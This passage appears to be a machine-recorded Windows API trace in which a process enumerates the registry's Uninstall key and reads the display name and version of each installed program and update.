lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.439] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x76) returned 0x0 [0221.440] RegCloseKey (hKey=0x314) returned 0x0 [0221.440] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.440] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x16) returned 0x0 [0221.440] RegCloseKey (hKey=0x314) returned 0x0 [0221.441] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xd, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.441] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.441] RegCloseKey (hKey=0x314) returned 0x0 [0221.442] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.442] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.442] RegCloseKey (hKey=0x314) returned 0x0 [0221.442] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xe, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.443] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.443] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.443] RegCloseKey (hKey=0x314) returned 0x0 [0221.443] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.444] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.445] RegCloseKey (hKey=0x314) returned 0x0 [0221.445] RegEnumKeyExW (in: hKey=0x310, dwIndex=0xf, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.445] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.446] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.446] RegCloseKey (hKey=0x314) returned 0x0 [0221.446] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.446] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.447] RegCloseKey (hKey=0x314) returned 0x0 [0221.447] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x10, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.447] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.448] RegCloseKey (hKey=0x314) returned 0x0 [0221.448] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.448] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.448] RegCloseKey (hKey=0x314) returned 0x0 [0221.449] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x11, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.449] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.449] RegCloseKey (hKey=0x314) returned 0x0 [0221.450] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.450] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.450] RegCloseKey (hKey=0x314) returned 0x0 [0221.450] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x12, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.451] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.451] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.451] RegCloseKey (hKey=0x314) returned 0x0 [0221.451] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.452] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.452] RegCloseKey (hKey=0x314) returned 0x0 [0221.452] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x13, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.452] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.453] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.453] RegCloseKey (hKey=0x314) returned 0x0 [0221.453] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.454] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x800) returned 0x2 [0221.454] RegCloseKey (hKey=0x314) returned 0x0 [0221.454] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x14, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.454] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.455] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x78) returned 0x0 [0221.455] RegCloseKey (hKey=0x314) returned 0x0 [0221.455] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.455] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x18) returned 0x0 [0221.456] RegCloseKey (hKey=0x314) returned 0x0 [0221.456] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x15, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.456] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.456] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7a) returned 0x0 [0221.457] RegCloseKey (hKey=0x314) returned 0x0 [0221.457] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.457] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1a) returned 0x0 [0221.457] RegCloseKey (hKey=0x314) returned 0x0 [0221.458] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x16, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.458] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.458] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x7a) returned 0x0 [0221.458] RegCloseKey (hKey=0x314) returned 0x0 [0221.459] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.459] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1a) returned 0x0 [0221.459] RegCloseKey (hKey=0x314) returned 0x0 [0221.459] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x17, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.460] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x86) returned 0x0 [0221.460] RegCloseKey (hKey=0x314) returned 0x0 [0221.460] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.461] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1c) returned 0x0 [0221.461] RegCloseKey (hKey=0x314) returned 0x0 [0221.461] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x18, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.461] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.462] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x86) returned 0x0 [0221.462] RegCloseKey (hKey=0x314) returned 0x0 [0221.462] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.463] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1c) returned 0x0 [0221.463] RegCloseKey (hKey=0x314) returned 0x0 [0221.463] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x19, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.463] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.464] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4d, lpcbData=0x27e7e8*=0x54) returned 0x0 [0221.464] RegCloseKey (hKey=0x314) returned 0x0 [0221.464] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.465] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x38, lpcbData=0x27e7e8*=0x14) returned 0x0 [0221.465] RegCloseKey (hKey=0x314) returned 0x0 [0221.465] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1a, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0000-0000-0000000FF1CE}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.465] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.466] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4f, lpcbData=0x27e7e8*=0x5e) returned 0x0 [0221.466] RegCloseKey (hKey=0x314) returned 0x0 [0221.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.466] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1e) returned 0x0 [0221.467] RegCloseKey (hKey=0x314) returned 0x0 [0221.467] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1b, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-008C-0409-0000-0000000FF1CE}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.467] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.467] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x4f, lpcbData=0x27e7e8*=0x5c) returned 0x0 [0221.468] RegCloseKey (hKey=0x314) returned 0x0 [0221.468] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.468] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x1e) returned 0x0 [0221.468] RegCloseKey (hKey=0x314) returned 0x0 [0221.469] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1c, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.469] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.469] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x55, lpcbData=0x27e7e8*=0x68) returned 0x0 [0221.470] RegCloseKey (hKey=0x314) returned 0x0 [0221.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4503575", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.470] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x31, lpcbData=0x27e7e8*=0x4) returned 0x0 [0221.470] RegCloseKey (hKey=0x314) returned 0x0 [0221.471] RegEnumKeyExW (in: hKey=0x310, dwIndex=0x1d, lpName=0x27ecc0, lpcchName=0x27ef10, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0x27ef10, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0221.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x314) returned 0x0 [0221.471] RegQueryValueExW (in: hKey=0x314, lpValueName="DisplayName", 